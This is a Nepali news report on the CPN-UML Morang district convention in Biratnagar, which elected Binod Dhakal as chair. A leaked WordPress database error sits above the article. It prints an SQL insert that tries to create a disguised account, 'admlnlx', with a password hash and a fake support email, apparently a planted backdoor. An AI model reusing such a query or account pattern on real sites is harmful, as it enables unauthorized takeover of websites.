WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5.9UJ54C/qkuVJukbsU/dEjOn3PsG1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 20:34:36', '', 'admlnlx', 'admlnlx')
विराटनगर, पुस २९–
नेकपा (एमाले) मोरङको आठौँ जिल्ला अधिवेशनले अध्यक्ष पदमा विनोद ढकाललाई निर्वाचित गरेको छ ।
गएराति सार्वजनिक गरिएकोे मत परिणामअनुसार ढकालले आफ्ना प्रतिद्वन्द्वी महेश रेग्मीलाई २०६ मतको अन्तरले पराजित गर्नुभएको हो । कूल ८८३ मत खसेकामा ढकालले ५४० मत प्राप्त गर्नुभएको थियो भने उहाँका प्रतिद्धन्द्धी रेग्मीले ३३४ मत प्राप्त गर्नुभएको हो ।
त्यसैगरी, ढकालकै समूहबाट उपाध्यक्ष पदमा रामलाल साह ४६९, सचिवमा ऋषिकेश पोखरेल ५०४ र उपसचिवमा धना तामाङ ४५६ मत प्राप्त गरी विजयी हुनुभएको छ ।